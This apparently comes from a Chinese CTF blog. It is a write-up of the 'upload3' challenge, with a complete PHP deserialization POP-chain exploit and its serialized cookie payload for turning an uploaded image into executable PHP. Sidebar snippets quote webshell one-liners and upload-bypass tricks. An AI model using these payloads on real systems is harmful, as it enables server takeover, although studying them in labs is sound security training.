攻防世界--upload3

最新推荐文章于 2024-08-09 10:37:24 发布
最新推荐文章于 2024-08-09 10:37:24 发布
阅读量1.8k 收藏 3
点赞数 3
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122429013
版权

注册登陆

上传文件
 

发现上传一次后没法上传第二次了。。。
重新注册个号,尝试上传php文件发现被拦截了,改成.jpg也被拦截了,猜测这里检测了文件头,想起之前伪造文件头,在文件开头添加GIF89A即可

 虽然可以成功上传上去,但是没法执行

扫描目录发现源码泄漏,访问/www.tar.gz

Profile.php文件

这里限制了上传文件的后缀名

Cookie这里有个序列化
 

猜测是反序列化 ,覆盖掉filename即可实现文件名任意

__get() 用于从不可访问的属性读取数据
__call() 在对象上下文中调用不可访问的方法时触发

给其 except 成员变量赋值 [‘index’ => ‘img’],代表要是访问 index 这个变量,就会返回 img。而后又给 img 赋值 upload_img,让这个对象被访问不存在的方法时最终调用 upload_img。

 

赋值控制 filename_tmp 和 filename 成员变量。可以看到前面两个判断我们只要不赋值和不上传变量即可轻松绕过。ext 这里也要赋值,让他进这个判断。而后程序就开始把 filename_tmp 移动到 filename,这样我们就可以把 png 移动为 php 文件了。

还要构造一个 Register,checker 赋值为 我们上面这个 $profile,registed 赋值为 false,这样在这个对象析构时就会调用 profile 的 index 方法,再跳到 upload_img 了。

POC:

<?php

namespace app\web\controller;
error_reporting(0);
class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;


    public function __get($name)
    {
        return $this->except[$name];
    }

    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

}

class Register
{
    public $checker;
    public $registed;

    public function __destruct()
    {
        if(!$this->registed){
            $this->checker->index();
        }
    }

}

$profile = new Profile();
$profile->except = ['index' => 'img'];
$profile->img = "upload_img";
$profile->ext = "png";
$profile->filename_tmp = "./upload/e0080b11355313cb26095733241d9209/0412c29576c708cf0155e8de242169b1.png";
$profile->filename = "./upload/e0080b11355313cb26095733241d9209/0412c29576c708cf0155e8de242169b1.php";

$register = new Register();
$register->registed = false;
$register->checker = $profile;

echo urlencode(base64_encode(serialize($register)));

得出

TzoyNzoiYXBwXHdlYlxjb250cm9sbGVyXFJlZ2lzdGVyIjoyOntzOjc6ImNoZWNrZXIiO086MjY6ImFwcFx3ZWJcY29udHJvbGxlclxQcm9maWxlIjo3OntzOjc6ImNoZWNrZXIiO047czoxMjoiZmlsZW5hbWVfdG1wIjtzOjc4OiIuL3VwbG9hZC9lMDA4MGIxMTM1NTMxM2NiMjYwOTU3MzMyNDFkOTIwOS8wNDEyYzI5NTc2YzcwOGNmMDE1NWU4ZGUyNDIxNjliMS5wbmciO3M6ODoiZmlsZW5hbWUiO3M6Nzg6Ii4vdXBsb2FkL2UwMDgwYjExMzU1MzEzY2IyNjA5NTczMzI0MWQ5MjA5LzA0MTJjMjk1NzZjNzA4Y2YwMTU1ZThkZTI0MjE2OWIxLnBocCI7czoxMToidXBsb2FkX21lbnUiO047czozOiJleHQiO3M6MzoicG5nIjtzOjM6ImltZyI7czoxMDoidXBsb2FkX2ltZyI7czo2OiJleGNlcHQiO2E6MTp7czo1OiJpbmRleCI7czozOiJpbWciO319czo4OiJyZWdpc3RlZCI7YjowO30%3D

替换value

访问.php文件即可成功执行
  

Uzero.
关注
aspupload3上传组件破解版.rar
05-03
aspupload3上传组件破解版.rar
攻防世界 web高手进阶区 10分题 upload3
闵行小鱼塘
11-23 1775
继续ctf的旅程,攻防世界web高手进阶区的10分题,本文是upload3的writeup
攻防世界web进阶区upload
gongjingege的博客
08-15 536
这道题头都被打烂了。。。 题目为upload,第一反应文件上传,一句话菜刀就行了,结果,结果是注入。。。 (思维还是不灵活,脑洞还是不够大) 打开题目,先注册,这里没有注入 登录然后进入上传界面 写个一句话木马,上传 试了好几个,php,txt,都是文件扩展不对,只有jpg可以,应该是白名单过滤 同时界面将文件名回显 推测,将文件存入了数据库,显示文件名,当你输入查询数据库的语句时,是不是可以读取数据库 那么,结合大佬的wp,将文件名构造成sql查询语句(这个思路骚气。。。) 试着构造的时候,发现sel
攻防世界upload3
qq_28808571的博客
05-25 905
1.看到题目为文件上传,且题目描述中有源码泄露。将源码下载后发现为thinkphp5.1,于是直接百度发现thinkphp5.x的反序列化漏洞,但是由于源码中含有查找文件,一开始误以为是文件名注入. 但对源码的审计发现,对上传的文件检查还是比较严格的 还检查了文件头,但是可以使用GIF89a+一句话还是能够上传成功的,上传成功后可以在上传界面查看源码得到路径 结合源码发现这是 ...
攻防世界upload
qq_51744055的博客
05-03 729
Hex()是MySQL的Sring函数。 此方法返回给定数字或字符串的十六进制字符串 a' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg 数据库名变成16进制 选取从第一个字母开始,往后数12个字母 hex 16进制再16进制 CONV(n,from_radix,to_radix):用于将n从from_radix进制转到to_radix进制 substr(str,start,length):将str从st
攻防世界-upload
qq_44065556的博客
09-24 1253
进入场景映入眼帘 需要注册账号 注册好之后,登录跳转页面 突破点应该就在这里了 我们先上传一个php文件 显示不正确的文件扩展名,被拦了 用burp抓包改信息 成功上传 但是没有上传路径 只能上传不能利用 思考(题目给的是upload,给的引导思路 就是上传文件拿flag) 我试着上传jpg,png格式的图片文件 有文件名回显,这说明文件已经被传到了数据库中,游览器又从数据库中读取了上传的文件,那么这个过程久有可能触发sql注入 ...
攻防世界-web-upload
wuh2333的博客
12-13 1488
攻防世界,web,upload,sql注入
CTF-WEB篇 攻防世界题目实战解析upload1
2301_76565920的博客
04-22 1569
题目:upload 知识点:一句话木马,webshell,burpsuite拦截并修改数据包
攻防世界】十三 --- upload1 --- 文件上传
qq_43168364的博客
12-25 492
题目 — upload1 一、writeup 这里上传了纯纯的一句话木马文件,快速的回显出了,弹窗 可以判断使用的是前端检测手段,将getshell.php改名为getshell.jpg上传,用bp抓包 上传成功 对应的目录用蚁剑链接即可 得到flag 二、知识点 文件上传 ......
攻防世界CTF题:upload1
Aixwei的博客
04-11 1206
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
攻防世界-upload1
Mr_helloword的博客
08-11 660
upload1 根据题目这是一道文件上传题 当上传一个php文件时提示只能上传图片,并且无法点击提交按钮,这应该是前端对文件类型进行了过滤 查看源代码: 发现一个调用了一个check()函数检测文件类型 我们把这个函数删除如下: 刷新页面发下新可以上传了: 用菜刀或者中国蚁剑连接:(注意菜刀可以连接但是无法查看flag我也不知道为啥) flag: $flag="cyberpeace{097e36244c66c690c16373cffd177aff} 菜刀,但是无法查看 但是无法查看 ...
上传文件之 common-fileupload3
iron李的博客
03-07 422
转自:http://blog.csdn.net/yerenyuan_pku/article/details/52540661#t3 由于文件上传需要注意的细节太多了,一篇文章全部容纳这些细节,真是太长了,索性再写一篇文章,处理文件上传需要注意的细节如何判断空的上传输入项在处理完文件上传需要注意的第6个细节后,测试时,如果
攻防世界upload1
金 帛的博客
04-24 2405
攻防世界之文件上传
攻防世界-web-ctf-upload
m0_52484587的博客
08-09 433
这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file。本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的。本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行。上传.user.ini,内容为。上传.user.ini。这里需要绕过的点如下。
攻防世界upload1(web)
yuanxu8877的博客
11-22 1253
攻防世界web-upload1
攻防世界进阶upload
舞动的獾
07-05 5418
攻防世界进阶upload 注册登陆后,发现上传页面 试着上传一个文件3.php: 内容如下: <?php eval(@$_POST['a']); ?> 我们试着将它改个名字抓包,并且改为jpg,措辞测试发现只有jog能够传上去 虽然上传成功,但是并不能显示出文件名的位置,蚁剑连接失败 看到回显名称有uid号,无奈的丝毫没有头绪 只好看了大佬的博客,竟然是注入,文件名称注入 当...
FancyUpload3 文件上传
洋洋照我心的专栏
05-25 2170
fancyupload是一个利用flash实现多文件上传的项目,官方网站为http://digitarald.de/project/fancyupload/,在一次项目中需要实现多文件上传,Google了一圈,没有找到一个能用的,只有上fancyupload的官方网站看了,发现fancyupload2在IE中已经不可用了,总是提示如下:  其原因作者也没有做出说明,这里笔者也不敢评论
攻防世界-高手进阶区之upload
Sacrifice_li的博客
06-12 696
进来页面如下: 然后就是正常的去注册一个用户,并且登录,我在这里也做了拦截,但是并没有什么有价值的信息: 登录进来之后是这样的一个页面,是文件上传(不过根据题目意思也是肯定可以知道的)。 我在这边也做了测试,只能够上传jpg文件,想要尝试php4,php5,php文件后缀都是不可以的。 然后我就在考虑是否是文件后缀截断上传,但是抓包截取内容之后并没有返回文件上传到哪里了,同时nikto和dirb扫描也没有发现什么有价值的信息。 接下来的话,就是看别人的wp了。不过说真的,第一次接触到.
攻防世界的web的upload1
最新发布
03-21
<think>嗯,用户需要关于攻防世界Web部分的Upload1挑战的解题思路或writeup。首先,我应该回忆一下常见的Upload类题目的常见漏洞点,比如文件上传绕过、黑名单过滤、MIME类型检查、.htaccess利用、内容检测绕过等。 根据提供的引用,其他Upload题目如upload3可能涉及Git泄露、远程命令执行漏洞(如ThinkPHP的RCE)或者数据库中的敏感表字段。可能需要扫描目录,利用工具如GitHack获取源码,或者通过上传webshell获取flag。例如引用[2]提到通过Git泄露获取源码,引用[4]使用了ThinkPHP的RCE漏洞执行命令。 对于Upload1,可能类似的思路适用。首先需要检查是否有前端验证,比如文件类型、扩展名的检查,是否可以被绕过,比如修改Content-Type、使用双扩展名(如.php.jpg)、或者大小写绕过(如.PhP)。此外,服务器可能配置了黑名单,需要尝试上传.htaccess文件来允许执行特定扩展名,或者利用解析漏洞,比如Apache的解析顺序问题。 另外,可能需要结合其他漏洞,比如文件包含,通过上传图片马,然后利用文件包含漏洞执行其中的代码。或者检查是否有二次渲染,使用绕过技巧。也有可能上传后文件名被重命名,需要找到上传路径和文件名规律。 查看用户提供的引用,特别是引用[3]中提到secret_table和fl4g字段,可能提示需要数据库注入或读取文件,比如通过上传PHP文件执行系统命令读取flag。引用[4]中的RCE payload可能相关,如果存在框架漏洞的话。 综上,解题步骤可能包括:检查前端验证,尝试绕过文件类型检查;上传webshell或恶意文件;利用解析漏洞或.htaccess;结合其他漏洞如文件包含或RCE执行命令获取flag。需要分步骤测试,并参考已有的writeup中的常见方法。</think>### 攻防世界 Web Upload1 解题思路 #### 1. **题目初步分析** - **目标场景**:文件上传类挑战,通常需要绕过上传限制,上传恶意文件(如Webshell)或触发漏洞获取服务器权限。 - **常见限制**:扩展名黑名单、MIME类型检查、文件内容检测、路径重命名等[^1][^3]。 #### 2. **关键步骤与绕过方法** 1. **检查前端验证**: - 通过浏览器开发者工具查看前端代码,确认是否有扩展名过滤逻辑。若存在,可手动修改请求绕过(如Burp Suite拦截修改`filename`)[^2]。 - 示例Payload:上传`.php`文件,修改为`.php5`或`.phtml`(若服务器解析此类扩展名)。 2. **绕过MIME类型检测**: - 若服务器校验`Content-Type`,需伪造类型(如`image/jpeg`),但文件内容仍保留PHP代码。 - 示例上传请求头修改: ```http Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: image/jpeg ``` 3. **利用.htaccess文件覆盖**(适用于Apache服务器): - 上传`.htaccess`文件,配置特定扩展名解析为PHP: ```apache AddType application/x-httpd-php .abc ``` - 后续上传扩展名为`.abc`的Webshell即可执行。 4. **文件内容绕过**: - 若服务器检测文件内容关键字(如`<?php`),可替换为短标签`<?=`或使用编码/混淆技术。 - 示例代码: ```php <?= system($_GET[&#39;cmd&#39;]); ?> ``` 5. **结合其他漏洞**: - 若存在文件包含漏洞,可上传图片马(如包含PHP代码的JPEG文件),通过包含触发代码执行[^4]。 - 若服务器存在已知框架漏洞(如ThinkPHP RCE),直接构造Payload读取Flag。 #### 3. **实战示例** 假设题目限制上传`.php`但未过滤`.phar`: 1. 上传Webshell文件`shell.phar`,内容为: ```php <?php system("cat /flag"); ?> ``` 2. 访问上传路径`/uploads/shell.phar?cmd=ls`,触发命令执行。 #### 4. **扩展技巧** - **双写扩展名绕过**:如`shell.pphphp`,若过滤逻辑为删除`php`字符串。 - **大小写混淆**:如`shell.PhP`(Windows服务器不区分大小写)。 - **利用解析漏洞**:如`shell.php.jpg`被Apache解析为PHP(需特定配置)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值